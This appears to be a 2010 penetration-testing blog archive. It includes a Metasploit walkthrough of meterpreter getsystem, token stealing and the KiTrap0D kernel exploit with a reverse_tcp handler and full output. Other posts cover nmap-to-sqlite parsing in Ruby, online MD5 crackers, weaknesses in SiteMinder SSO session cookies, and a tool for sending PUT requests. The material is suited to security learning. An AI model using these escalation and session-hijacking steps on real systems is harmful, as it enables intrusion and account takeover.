Friday, January 29, 2010

metasploit getsystem command

Shiny new hotness...

meterpreter > getuid
Server username: WINXPSP3\user
**user is an admin, if not admin you can only use -t 4 or -t 0 which will iterate through all options**

meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h

Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.


-h Help Banner.

The technique to use. (Default to '0').
0 : All techniques available

1 : Service - Named Pipe Impersonation (In Memory/Admin)

2 : Service - Named Pipe Impersonation (Dropper/Admin)

3 : Service - Token Duplication (In Memory/Admin)

4 : Exploit - KiTrap0D (In Memory/User)

meterpreter > getsystem -t 1 system (via technique 1).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > getsystem -t 2 system (via technique 2).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > getsystem -t 3 system (via technique 3).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > getsystem system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Hey I want user back!

meterpreter > getsystem -t 4 system (via technique 4).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM


meterpreter > steal_token -h

[-] Usage: steal_token [pid]

meterpreter > ps

Process list


PID Name Arch User Path

--- ---- ---- ---- ----
0 [System Process]

368 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe

592 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe

616 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe

660 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe

672 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe

832 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe

908 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe

1000 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe

1048 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe

1088 svchost.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe

1440 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe

1560 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE

540 alg.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe

980 wscntfy.exe x86 WINXPSP3\user C:\WINDOWS\system32\wscntfy.exe

1360 wuauclt.exe x86 WINXPSP3\user C:\WINDOWS\system32\wuauclt.exe

2004 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe

2000 ctfmon.exe x86 WINXPSP3\user C:\WINDOWS\system32\ctfmon.exe

960 WINWORD.EXE x86 WINXPSP3\user C:\Program Files\Microsoft Office\Office12\WINWORD.EXE

664 WYvWeNeBQtYr.exe x86 NT AUTHORITY\SYSTEM C:\Documents and Settings\user\WYvWeNeBQtYr.exe

meterpreter > steal_token 1560

Stolen token with username: WINXPSP3\user

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > shell
<--now uses -t by default Process 1272 created. Channel 2 created.
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami



C:\Documents and Settings\user>

wait I want a SYSTEM shell again

meterpreter > drop_token
Relinquished token, now running as: WINXPSP3\user
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 856 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user>whoami

C:\Documents and Settings\user>

or call execute without -t to use your process token

meterpreter > execute -f cmd.exe -i -c -H
Process 676 created.
Channel 5 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user>whoami

C:\Documents and Settings\user>


KiTrap0d now in metasploit

more for documentation and historical purposes than "new hotness"

original advisory
"Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack"

Now implemented in Metasploit

msf exploit(handler) > set PAYLOAD windows/meterpreter/
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started reverse handler on port 443
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened ( ->

meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > sysinfo
Computer: WINXPSP3
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language: en_US
meterpreter > run ki
run killav run kitrap0d
meterpreter > run kitrap0d
[*] Currently running as WINXPSP3\user

[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\pOOiEDDBFzJ.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1128)...

Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- ---

[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x29142 bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 1316
[?] OpenProcess(1316) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7cc, INFINITE);
[?] GetExitCodeThread(0x7cc, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier

[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

**Nipple Rub...**

Friday, January 22, 2010

Ruby, Nmap XML, and Databases

So I had a requirement to take some output from nmap scans, shove it into a database and then be able to run some queries on that data.

Wait, isn't there something that already does that?!

Actually PBNJ and will do this but uses (eeeek!) perl to do it. I wanted to do it in Ruby.

Your options for Ruby & Nmap parsing are:

-metasploit has its own nmap xml parser
-writing your own

I started with rubynmap for my parsing gem.
(Note: use the svn version. the version # hasn't changed but the svn version works alot better)

I stole the schema from nmap_xml2sql and added a few things and a scripts table for nmap scripts output and tried shoving that into a sqlite3 database.
TABLE nmap (
version TEXT,
xmlversion TEXT,
args TEXT,
types TEXT,
starttime INTEGER,
startstr TEXT,
endtime INTEGER,
endstr TEXT,
numservices INTEGER)

TABLE hosts (
ip4 TEXT,
ip4num INTEGER,
hostname TEXT,
status TEXT,
tcpcount INTEGER,
udpcount INTEGER,
mac TEXT,
vendor TEXT,
ip6 TEXT,
distance INTEGER,
uptime TEXT,
upstr TEXT)
This "works" but sqlite3 doesn't seem to actually support foreign keys. So while I was correctly assigning a SID value in nmap that value wasn't linking up in hosts and the HID value in subsequent tables. If I'm wrong here please let me know if this works for you as written. For me in populates with nulls and I don't see how its linking back to the tables.
cg@ihatesql:~$ sqlite3 nmap
SQLite version 3.6.21
sqlite> .dump nmap
nmapversion TEXT,
xmlversion TEXT,
args TEXT,
types TEXT,
starttime INTEGER,
startstr TEXT,
endtime INTEGER,
endstr TEXT,
numservices INTEGER);
INSERT INTO "nmap" VALUES(1,'4.90RC1','1.03','nmap -A -oX test.xml','connect',1262181807,'Wed Dec 30 09:03:27 2009',1262181814,'Wed Dec 30 09:03:34 2009',1000);

sqlite> .dump hosts
ip4num INTEGER,
hostname TEXT,
status TEXT,
mac TEXT,
vendor TEXT,
ip6 TEXT,
distance INTEGER,
uptime TEXT,
starttime INTEGER,
endtime INTEGER,
INSERT INTO "hosts" VALUES(NULL,1,'','','up','','','','','',1262181807,1262181814);
so we can see that the SID and HID are correctly auto incrementing but the SID didn't make it into the hosts table

**Actually sqlite3 as of 3.6.19 supports foreign adding a
FOREIGN KEY(sid) REFERENCES nmap(sid) to the hosts table and so on. And by declaring PRAGMA foreign_keys = ON.

BUT I still couldn't get it to work.

doing a db.execute("PRAGMA foreign_keys = ON") wasn't working for me. I received no errors but doing a dump on the table would list the foreign key support as OFF :-( maybe its a gem issue?

So to cheat I added ip4num, ip6, hostname to tables i knew I'd be querying a lot like ports and scripts.

ip4num INTEGER,
ip6 TEXT,
state TEXT,
reason TEXT,
name TEXT,
tunnel TEXT,
product TEXT,
version TEXT,
extra TEXT,
confidence INTEGER,
method TEXT,
proto TEXT,
owner TEXT,
rpcnum TEXT,
fingerprint TEXT,

That way, querying for open ports or specific versions of a service were possible and I could still get an IP associated with that. A bit harder to pull all that information together but still there and a select * from ports; or select ip4num from ports where port = 1521; would return quick results.

So code or it didn't happen...

nmap-parse takes an nmap xml file and spits out some of the results

rubynmapsqlite3 takes an nmapfile and database name (optional), creates or connects to the database, populates the tables if it needs to, parses the nmap xml and puts it into its appropriate tables.

ruby-nmap-parse uses the ruby-nmap gem to parse nmap xml files

-my ruby coding sucks.
-my SQL coding sucks worse.
-code is released in "works for me" status
-send diffs not complaints :-) unless you go crazy with it, in which case just send me a link to your code

Next up pushing that data into a postgres database instead of sqlite3.

Monday, January 18, 2010

DirChex_v1.3 re-posted / PUT problem fixed.

Quick Note:

There were some issues with DirChex on some machines (after compilation) relating to handling response code errors / performing the PUT option. This has been fixed by changing compilation options.

Feel free to Download again. Apologies for the inconvenience.

Happy Hacking!


Monday, January 11, 2010

Various Online Password Crackers

Just a list of online (mostly) md5 crackers but some with do others

This post over on pcsec got me thinking about them.

Of course not all those are working, least not for me.

So here is that list with links and a few others thanks to my twitter homies

Bonus points for two of the sites from the screen shot just giving you a parallels plesk login.

Sites specifically mentioned to me in no particular order (also has IRC support)
c0llision: (also has IRC support)

For fun, a metasploit module that submits the hash to and displays the password if its found.

Lastly, for fun, a metasploit module that submits the hash to and displays the password if its found.

msf auxiliary(md5check_md5crack) > run

[*] Sending 098f6bcd4621d373cade4e832627b4f6 hash to
[*] plaintext md5 is: test
[*] Auxiliary module execution completed

link: (rename to .rb)

I started to do more than just md5crack but writing regex's for different sites just seemed like a waste of time.

Sunday, January 10, 2010

SiteMinder Single Sign-On / Security Risks


Recently I was having a discussion with some folks about Web Security and amongst some of the items discussed was Single Sign-On. It reminded me of SiteMinder and some things that bothered me about how some organizations utilize the solution. Especially the blind reliance upon the vendor to have written a secure solution rather than verifying if this technology is being employed correctly.

Sometimes its not the software created it is the folks that configure it that cause the headache. Sometimes the biggest flaw is inherent because of the very nature for which the software was intended to be used in the first place. When you configure this incorrectly AND you do it at the Single Sign-On server level it can literally be an "epic fail". In a large organization it can potentially leave hundreds or even thousands of sites open for compromise.

So I first noticed the odd configuration and therefore the potentially insecure nature of SiteMinder approximately 1 year or so ago (can't remember, could have been longer). I thought I would share some of details with you the reader to give a better idea of where some of the pitfalls might exist and maybe this helps someone who is charged with installing/configuring the SiteMinder solution in the future. I really don't believe this could be ONLY a SiteMinder specific issue. My personal belief is this can hold true for any Single Sign-On solution if improperly managed.

Now keep in mind I am not a full-time researcher. That being said, this is simply what I've observed. Also, I encourage anyone reading this to invest some time playing around with the technology. Don't just take my word for it. I will not detail the EXACT steps for correct configuration but more of a broader approach to where things I've seen things go wrong and some proactive steps to take.

First lets talk about the benefits of SiteMinder SSO:

1) Can be used as a means of verifying and/or restricting the user before ever viewing the application. As an attacker I may not need to be logged in to cause damage. So having anonymous access to the unprotected portion of your site could still be used as a launch platform for another attack such as XSS, SQLi, abuse of account registration, password recovery, default content discovery.... etc, etc.

2) Can be configured to require two factor authentication.

3) Has the ability to provide either two-factor authentication (Common Access Cards) OR if your users do not have access to CAC equipment this allows for form based authentication as well. So it is convenient.

4) A bit more difficult to brute force login credentials AND can enforce account lock-out while mitigating other security concerns like registration, etc. However, this is a very general statement and in many cases isn't implemented correctly.

5) Simple account management. This doesn't requires a user to remember, or jot down on a sticky pad ;-), their user-name and password to a large number of applications.

Lets detail some of the drawbacks:

1) The solution is not infallible but in the cases I've come across is treated as such.

2) If one site fails at any number of things other sites can become targets of attack and possibly victims of a compromise.

3) The user privacy issue. ESPECIALLY when employing CAC / PKI authentication. The data held on a user's Common Access Card can be logged on the web application they are using and in some cases most certainly is (for troubleshooting purposes?).

The data within their CAC can hold valuable information about the individual that certainly wouldn't allow anyone to view, so why would a web app developer need this information to the purposes of troubleshooting the SiteMinder solution? This basically boils down to trust I suppose and I'm sure can be argued in length about.

Details of the SiteMinder authentication (what I've observed):

1)    A user requests target URL

2)    User is then redirected to

3)    The user submits a request with

4)    The ssoserver site is checking to see if we already have a valid session.

5)    The normal response is to set a HTTP 302 method with a redirection to with a parameter SMSESSION=NO. This basically tells the applications that this user does not have a valid SiteMinder session and must authenticate.

6)    At this point provides a HTTP 401 (authorization required) message and sets the browser's cookie as SMCHALLENGE=YES.
Now keep in mind, these are two different sites so the SSL stream is broken by default and because of this it will work even if one application does not employ SSL. This is important when dealing with sites that have “Forceful Browsing” vulnerabilities or simply not using SSL.

7)    So now the user's browser sends a request to with basic authorization and a cookie - SMCHALLENGE=YES.

8)    The response from is a redirection (HTTP 302) to with the session value in the query. For example,
NOTE: This is bad. This value is sent in the header of the request and is now stored in three separate locations. 1) Proxy logs 2) Server side logs 3)In the users browser. Additionally, this value is your “Master Key” AND in may cases is not set to expire for some time for user friendly purposes.

9)    Simultaneous with Step 8, is now performing a
set-cookie= SMSESSION-ABC123 ; path=/; secure
and this is within the 302 redirection response. So take note that the secure flag is set and the path is for the BUT no HttpOnly flag. This means that client side Javascript can interact with the cookie.

10)    So as stated previously in step 8 we are sending a GET request to
NOTE: The target value has special characters URL encoded.

11)    The response from is a redirection (HTTP 302) to with a set-cookie= SMSESSION-ABC123; path=/;; secure

12)    The user's browser sends a request to
The referrer is set as and now two SMSESSION cookie values are provided/set. In this initial request both SMSESSION values (cookie) are set as SMSESSION-ABC123 and passed to the application in the subsequent request.

13)    Now the user is redirected via a HTTP 302 to and the new SMSESSION value set following the first request is XYZ123. Remember the user will always pass two SMSESSION values. One of those values is the “Master Key” SMSESSION-ABC123 and SMSESSION-XYZ. For all subsequent requests to resources on the SMSESSION value will be checked. If you have this value then you are allowed into the site with the caveat being that your ssoserver account must have permissions to view this application.

Security Concerns:

1) XSS will allow anything to be taken, which of course includes the “Master Key” SMSESSION value which is stored as a cookie value. CAVEAT: XSS must be performed on a site; otherwise the domain mismatch will not allow the cookie value to be stolen. An attacker can replay this cookie/query value to gain access to a list of * sites (details - Number 6)

2) The SMSESSION value is stored in the browser cache due to the fact that a GET request was sent with the value in the header.

3) Usually this value does not expire for quite some time.

4) If the application does not enforce SSL this value will be shown in clear-text across the wire.

5) Due to the fact the HttpOnly flag is NOT set, Javascript can interact with the cookies.

6) Any application the user has access to can become a potential target. The applications which employ the SiteMinder agent will check to see if the user already has a valid SiteMinder session. If the Master Key (SMSESSION-ABC123) is employed, the will recognize this as a valid SMSESSION when the attacker’s browser is redirected to the ssoserver for an active session validation. Once the ssoserver determines the cookie value provided by the attacker is a valid session value the attacker is given the necessary SMSESSION cookie for accessing the target web application.

7) The SMSESSION value, in all of the instances for which I’ve observed, are not salted by IP nor limited by session. This means simultaneously a user in Egypt can access an application utilizing the same SMSESSION value a user in Canada is currently using.

Wednesday, January 6, 2010

DirChex_v1.3 Released / GUI Remains responsive

As an update I've just uploaded DirChex_v1.3 which will NOT freeze up while sending the requests you specify. Also because the GET requests / PUT Requests / GUI all have separate threads you can basically do more at once without worrying about it. Its just a nice enhancement.

Download 1.3 Here

Happy Hacking!

Sunday, January 3, 2010

DirChex_v1.2 Released (New Functionality)

The new version of DirChex is ready and available for download Download Here.

So @k3r0s1n3 is on the hook for creating the visual layout of a BT4 specific version ;-) BUT we do have a the exe version and source available for v1.2. In the meantime, the BT4 specific version of 1.1 will remain up on the downloads page. Also, I'd love to hear from someone with a mac/OSX and see how it goes running DirChex on this platform.

Moving along..... DirChex now has two tabs. A 'GET' and a 'PUT' tab.

We've already pointed at how the GET tab works in previous posts. For the 'PUT' tab things get a bit different. For one, the HTTP method is obviously PUT vice GET.  Secondly, you have more options. Thirdly, the file you upload must have the list of URLs in the proper format otherwise the reason for using it is negated.




A file containing correctly formatted URLs

Now for the options

The first options are obvious and the same as the GET tab. You need to choose an input file like the one above. Then select either the default proxy ip/port options or enter your own. The next couple of options require a bit of explanation.

OPTION: Name of the file to PUT

If I want to create a test.txt file on the remote application I would enter test.txt in this field.

OPTION: Text within the field

This is where you would enter the text you would like place in the test.txt file. I've entered "This is my example text"

OPTION: Choose content-type / MIME Property

Here you would want to select the various available content-types (MIME Media). If you are unsure just choose the first available choice 'application/x-www-form-urlencoded'.

OPTION: Choose your user-agent

This one is self explanatory.

When all options are correctly filled in it should look like this:

This is what the request would look like in raw form (using Burp Suite)

If you have any questions/comments let us know, suggestions are welcome!

Lastly, we are aware that the program freezes up until all requests are completed. Apologies, we are working on this. For now, some functionality was added and I hope you find it useful.

Happy Hacking!

~cktricky & k3r0s1n3